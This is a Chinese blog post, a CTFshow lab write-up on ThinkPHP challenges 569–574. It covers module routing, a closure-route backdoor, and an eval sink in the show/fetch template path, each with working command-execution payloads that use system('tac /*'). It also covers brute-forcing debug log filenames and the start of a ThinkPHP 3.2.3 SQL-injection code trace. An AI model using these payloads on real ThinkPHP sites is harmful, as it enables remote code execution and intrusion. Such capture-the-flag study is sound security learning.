<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png?v=2.6.2" sizes="180x180"><link rel="mask-icon" href="/images/icons/stun-logo.svg?v=2.6.2" color="#54bcff"><meta name="msapplication-TileImage" content="/images/icons/favicon-144x144.png"><meta name="msapplication-TileColor" content="#000000"><meta name="baidu-site-verification" content="code-15zD58SrOe"><meta name="description" content="ThinkPHP       一些ThinkPHP的基础知识：  关于ThinkPHP的模块化设计 关于ThinkPHP的闭包支持  569 知道模块化设计就很简单了 123典型访问规则http:&#x2F;&#x2F;serverName&#x2F;index.php（或者其他应用入口文件）&#x2F;模块&#x2F;控制器&#x2F;操作&#x2F;[参数名&#x2F;参数值...]&#x2F;index.php&#x2F;Admin&#x2F;Login&#x2F;ct">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshowThinkPHP专题">
<meta property="og:url" content="http://jlan.darkflow.top/posts/80a6314c.html">
<meta property="og:site_name" content="Jlan&#39;s Little World">
<meta property="og:description" content="ThinkPHP       一些ThinkPHP的基础知识：  关于ThinkPHP的模块化设计 关于ThinkPHP的闭包支持  569 知道模块化设计就很简单了 123典型访问规则http:&#x2F;&#x2F;serverName&#x2F;index.php（或者其他应用入口文件）&#x2F;模块&#x2F;控制器&#x2F;操作&#x2F;[参数名&#x2F;参数值...]&#x2F;index.php&#x2F;Admin&#x2F;Login&#x2F;ct">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206131917820.png">
<meta property="article:published_time" content="2022-06-12T12:03:04.000Z">
<meta property="article:modified_time" content="2022-06-13T16:23:22.773Z">
<meta property="article:author" content="Jlan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206131917820.png"><title>CTFshowThinkPHP专题 | Jlan's Little World</title><link ref="canonical" href="http://jlan.darkflow.top/posts/80a6314c.html"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"dark","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: {"avoidBanner":false},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/links/"><span class="header-nav-menu-item__icon"><i class="fas fa-user-friends"></i></span><span class="header-nav-menu-item__text">友链</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Jlan's Little World</div><div class="header-banner-info__subtitle">欢迎来学习知识</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">CTFshowThinkPHP专题</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-06-12</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2022-06-14</span></span><span class="post-meta-item post-meta-item--visitors leancloud_visitors" id="/posts/80a6314c.html" data-flag-title="CTFshowThinkPHP专题"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value leancloud-visitors-count"></span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h1 id="ThinkPHP"   >
          <a href="#ThinkPHP" class="heading-link"><i class="fas fa-link"></i></a><a href="#ThinkPHP" class="headerlink" title="ThinkPHP"></a>ThinkPHP</h1>
      <p>一些ThinkPHP的基础知识：</p>
<ol>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.kancloud.cn/manual/thinkphp/1696" >关于ThinkPHP的模块化设计</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
<li><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.kancloud.cn/manual/thinkphp/1710" >关于ThinkPHP的闭包支持</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></li>
</ol>
<p><strong>569</strong></p>
<p>知道模块化设计就很简单了</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">典型访问规则</span><br><span class="line">http://serverName/index.php（或者其他应用入口文件）/模块/控制器/操作/[参数名/参数值...]</span><br><span class="line">/index.php/Admin/Login/ctfshowLogin</span><br></pre></td></tr></table></div></figure>

<p><strong>570</strong></p>
<p>闭包路由，类似于将/后路径作为参数传入，设定闭包路由的文件在文件根目录/Common/Conf/config.php中</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">   <span class="string">&#x27;URL_ROUTER_ON&#x27;</span>   =&gt; <span class="literal">true</span>, </span><br><span class="line"><span class="string">&#x27;URL_ROUTE_RULES&#x27;</span> =&gt; <span class="keyword">array</span>(</span><br><span class="line">   <span class="string">&#x27;ctfshow/:f/:a&#x27;</span> =&gt;<span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$a</span></span>)</span>&#123;</span><br><span class="line">   	call_user_func(<span class="variable">$f</span>, <span class="variable">$a</span>);</span><br><span class="line">   	&#125;</span><br><span class="line">   )</span><br></pre></td></tr></table></div></figure>

<p>一个明显的后门，payload如下</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/index.php/ctfshow/assert/eval($_POST[1])</span><br><span class="line">POST:</span><br><span class="line">1=system(&#x27;tac /*&#x27;);</span><br></pre></td></tr></table></div></figure>

<p><strong>571</strong></p>
<p>show方法导致的命令执行</p>
<blockquote>

        <h2 id="渲染内容"   >
          <a href="#渲染内容" class="heading-link"><i class="fas fa-link"></i></a><a href="#渲染内容" class="headerlink" title="渲染内容"></a>渲染内容</h2>
      <p>如果你没有定义任何模板文件，或者把模板内容存储到数据库中的话，你就需要使用show方法来渲染输出了，show方法的调用格式：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">show(&#x27;渲染内容&#x27;[,&#x27;字符编码&#x27;][,&#x27;输出类型&#x27;])例如，$this-&gt;show($content);</span><br><span class="line">也可以指定编码和类型： $this-&gt;show($content, &#x27;utf-8&#x27;, &#x27;text/xml&#x27;);</span><br></pre></td></tr></table></div></figure>
</blockquote>
<p>那么我们去看看show方法到底执行了什么</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">show</span>(<span class="params"><span class="variable">$content</span>,<span class="variable">$charset</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$contentType</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$prefix</span>=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;view-&gt;display(<span class="string">&#x27;&#x27;</span>,<span class="variable">$charset</span>,<span class="variable">$contentType</span>,<span class="variable">$content</span>,<span class="variable">$prefix</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>往下看调用的display方法</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">display</span>(<span class="params"><span class="variable">$templateFile</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$charset</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$contentType</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$content</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$prefix</span>=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">    G(<span class="string">&#x27;viewStartTime&#x27;</span>);</span><br><span class="line">    <span class="comment">// 视图开始标签</span></span><br><span class="line">    Hook::listen(<span class="string">&#x27;view_begin&#x27;</span>,<span class="variable">$templateFile</span>);</span><br><span class="line">    <span class="comment">// 解析并获取模板内容</span></span><br><span class="line">    <span class="variable">$content</span> = <span class="keyword">$this</span>-&gt;fetch(<span class="variable">$templateFile</span>,<span class="variable">$content</span>,<span class="variable">$prefix</span>);</span><br><span class="line">    <span class="comment">// 输出模板内容</span></span><br><span class="line">    <span class="keyword">$this</span>-&gt;render(<span class="variable">$content</span>,<span class="variable">$charset</span>,<span class="variable">$contentType</span>);</span><br><span class="line">    <span class="comment">// 视图结束标签</span></span><br><span class="line">    Hook::listen(<span class="string">&#x27;view_end&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">fetch</span>(<span class="params"><span class="variable">$templateFile</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$content</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$prefix</span>=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$content</span>)) &#123;</span><br><span class="line">        <span class="variable">$templateFile</span>   =   <span class="keyword">$this</span>-&gt;parseTemplate(<span class="variable">$templateFile</span>);</span><br><span class="line">        <span class="comment">// 模板文件不存在直接返回</span></span><br><span class="line">        <span class="keyword">if</span>(!is_file(<span class="variable">$templateFile</span>)) E(L(<span class="string">&#x27;_TEMPLATE_NOT_EXIST_&#x27;</span>).<span class="string">&#x27;:&#x27;</span>.<span class="variable">$templateFile</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        defined(<span class="string">&#x27;THEME_PATH&#x27;</span>) <span class="keyword">or</span>    define(<span class="string">&#x27;THEME_PATH&#x27;</span>, <span class="keyword">$this</span>-&gt;getThemePath());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 页面缓存</span></span><br><span class="line">    ob_start();</span><br><span class="line">    ob_implicit_flush(<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="string">&#x27;php&#x27;</span> == strtolower(C(<span class="string">&#x27;TMPL_ENGINE_TYPE&#x27;</span>))) &#123; <span class="comment">// 使用PHP原生模板</span></span><br><span class="line">        <span class="variable">$_content</span>   =   <span class="variable">$content</span>;</span><br><span class="line">        <span class="comment">// 模板阵列变量分解成为独立变量</span></span><br><span class="line">        extract(<span class="keyword">$this</span>-&gt;tVar, EXTR_OVERWRITE);</span><br><span class="line">        <span class="comment">// 直接载入PHP模板</span></span><br><span class="line">        <span class="keyword">empty</span>(<span class="variable">$_content</span>)?<span class="keyword">include</span> <span class="variable">$templateFile</span>:<span class="keyword">eval</span>(<span class="string">&#x27;?&gt;&#x27;</span>.<span class="variable">$_content</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="comment">// 视图解析标签</span></span><br><span class="line">        <span class="variable">$params</span> = <span class="keyword">array</span>(<span class="string">&#x27;var&#x27;</span>=&gt;<span class="keyword">$this</span>-&gt;tVar,<span class="string">&#x27;file&#x27;</span>=&gt;<span class="variable">$templateFile</span>,<span class="string">&#x27;content&#x27;</span>=&gt;<span class="variable">$content</span>,<span class="string">&#x27;prefix&#x27;</span>=&gt;<span class="variable">$prefix</span>);</span><br><span class="line">        Hook::listen(<span class="string">&#x27;view_parse&#x27;</span>,<span class="variable">$params</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 获取并清空缓存</span></span><br><span class="line">    <span class="variable">$content</span> = ob_get_clean();</span><br><span class="line">    <span class="comment">// 内容过滤标签</span></span><br><span class="line">    Hook::listen(<span class="string">&#x27;view_filter&#x27;</span>,<span class="variable">$content</span>);</span><br><span class="line">    <span class="comment">// 输出模板文件</span></span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$content</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>在<code>TMPL_ENGINE_TYPE==&#39;php&#39;</code>时，关键就在这句话了<code>include $templateFile:eval(&#39;?&gt;&#39;.$_content);</code>此处的<code>$_content</code>我们是完全可控的，也就可以执行任意命令</p>
<p>而当<code>TMPL_ENGINE_TYPE!=&#39;php&#39;</code>时，执行的Hook中的listen方法，然后执行exec方法，然后run方法，最后加载并包含一个缓存文件</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">listen</span>(<span class="params"><span class="variable">$tag</span>, &amp;<span class="variable">$params</span>=<span class="literal">NULL</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="built_in">self</span>::<span class="variable">$tags</span>[<span class="variable">$tag</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(APP_DEBUG) &#123;</span><br><span class="line">            G(<span class="variable">$tag</span>.<span class="string">&#x27;Start&#x27;</span>);</span><br><span class="line">            trace(<span class="string">&#x27;[ &#x27;</span>.<span class="variable">$tag</span>.<span class="string">&#x27; ] --START--&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;INFO&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="built_in">self</span>::<span class="variable">$tags</span>[<span class="variable">$tag</span>] <span class="keyword">as</span> <span class="variable">$name</span>) &#123;</span><br><span class="line">            APP_DEBUG &amp;&amp; G(<span class="variable">$name</span>.<span class="string">&#x27;_start&#x27;</span>);</span><br><span class="line">            <span class="variable">$result</span> =   <span class="built_in">self</span>::exec(<span class="variable">$name</span>, <span class="variable">$tag</span>,<span class="variable">$params</span>);</span><br><span class="line">            <span class="keyword">if</span>(APP_DEBUG)&#123;</span><br><span class="line">                G(<span class="variable">$name</span>.<span class="string">&#x27;_end&#x27;</span>);</span><br><span class="line">                trace(<span class="string">&#x27;Run &#x27;</span>.<span class="variable">$name</span>.<span class="string">&#x27; [ RunTime:&#x27;</span>.G(<span class="variable">$name</span>.<span class="string">&#x27;_start&#x27;</span>,<span class="variable">$name</span>.<span class="string">&#x27;_end&#x27;</span>,<span class="number">6</span>).<span class="string">&#x27;s ]&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;INFO&#x27;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(<span class="literal">false</span> === <span class="variable">$result</span>) &#123;</span><br><span class="line">                <span class="comment">// 如果返回false 则中断插件执行</span></span><br><span class="line">                <span class="keyword">return</span> ;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(APP_DEBUG) &#123; <span class="comment">// 记录行为的执行日志</span></span><br><span class="line">            trace(<span class="string">&#x27;[ &#x27;</span>.<span class="variable">$tag</span>.<span class="string">&#x27; ] --END-- [ RunTime:&#x27;</span>.G(<span class="variable">$tag</span>.<span class="string">&#x27;Start&#x27;</span>,<span class="variable">$tag</span>.<span class="string">&#x27;End&#x27;</span>,<span class="number">6</span>).<span class="string">&#x27;s ]&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;INFO&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function load($_filename,$vars=null)&#123;</span><br><span class="line">    if(!is_null($vars))</span><br><span class="line">        extract($vars, EXTR_OVERWRITE);</span><br><span class="line">    eval(&#x27;?&gt;&#x27;.$this-&gt;read($_filename));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>















<p>最终payload</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php/Home/Index/index?n=&lt;?php%20system(%27tac%20/*%27);?&gt;</span><br></pre></td></tr></table></div></figure>

<p><strong>572</strong></p>
<p>ThinkPHP日志文件</p>
<p>题目中提到了爆破，在thinkphp开启debug的情况下会在Runtime目录下生成log文件，文件的名称是以<code>年_月_日.log</code>来命名的。所以我们可以来爆破文件名</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Application/Runtime/Logs/Home/xx_xx_xx.log</span><br></pre></td></tr></table></div></figure>

<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206131917820.png"></p>
<p>扫出了这么个文件，发现似乎传参showctf可执行php代码，拿到flag</p>
<p><strong>573</strong></p>
<p><strong>ThinkPHP 3.2.3sql注入漏洞</strong></p>
<p>先写个可以调用内置sql查询的主页</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">class IndexController extends Controller &#123;</span><br><span class="line">    public function index()&#123;</span><br><span class="line">    $a=M(&#x27;xxx&#x27;);  //表名</span><br><span class="line">    $id=I(&#x27;GET.id&#x27;);</span><br><span class="line">    $b=$a-&gt;find($id);</span><br><span class="line">    var_dump($b);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>在I方法中对输入的内容进行过滤，默认过滤器<code>DEFAULT_FILTER</code>是不会对单引号做过滤操作的，所以此处不用管，下面走<code>think_filter</code>方法，这里对一些敏感安全内容进行了过滤</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">think_filter</span>(<span class="params">&amp;<span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">	<span class="comment">// TODO 其他安全过滤</span></span><br><span class="line">	<span class="comment">// 过滤查询特殊字符</span></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i&#x27;</span>,<span class="variable">$value</span>))&#123;</span><br><span class="line">        <span class="variable">$value</span> .= <span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<p>OK，输入检查完毕，我们输入的内容进入到<code>find</code>方法中，这里的注释也对我们传入的参数做了详细的解释，下一步进一步跟踪<code>_parseOptions</code>方法，继续跟踪<code>_parseType</code>方法，该方法对内容类型进行解析</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 查询数据</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@access</span> public</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> mixed $options 表达式参数</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> mixed</span></span><br><span class="line"><span class="comment"> */</span></span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(is_scalar($val)) &#123;</span><br><span class="line">    $this-&gt;_parseType($options[&#x27;where&#x27;],$key);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">elseif(false === strpos($fieldType,&#x27;bigint&#x27;) &amp;&amp; false !== strpos($fieldType,&#x27;int&#x27;)) &#123;</span><br><span class="line">                $data[$key]   =  intval($data[$key]);</span><br></pre></td></tr></table></div></figure>





<p>先放一个yu师傅的<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/119424071" >代码审计</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>，以后再回来看</p>
<p><strong>574</strong></p>
<script type="text&#x2F;javascript" src="https://unpkg.com/kity@2.0.4/dist/kity.min.js"></script><script type="text&#x2F;javascript" src="https://unpkg.com/kityminder-core@1.4.50/dist/kityminder.core.min.js"></script><script defer="true" type="text&#x2F;javascript" src="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.js"></script><link rel="stylesheet" type="text&#x2F;css" href="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.css"></div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://jlan.darkflow.top">Jlan</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://jlan.darkflow.top/posts/80a6314c.html">http://jlan.darkflow.top/posts/80a6314c.html</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/posts/bd520300.html"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">2022校赛迎新</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/posts/f85e0a9a.html"><span class="paginator-prev__text">大佬文章合集</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ThinkPHP"><span class="toc-number">1.</span> <span class="toc-text">
          ThinkPHP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B8%B2%E6%9F%93%E5%86%85%E5%AE%B9"><span class="toc-number">1.1.</span> <span class="toc-text">
          渲染内容</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/head.png" alt="avatar"></div><p class="sidebar-ov-author__text">生命不息，折腾不止！</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/zhisenyu" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://www.youtube.com/channel/UCarZXyGTzWssmNANey0TC3g" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a><a class="sidebar-ov-social-item" href="z405454586" target="_blank" rel="noopener" data-popover="微信" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="tencent://message?uin=405454586" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">49</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">9</div><div class="sidebar-ov-state-item__name">标签</div></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 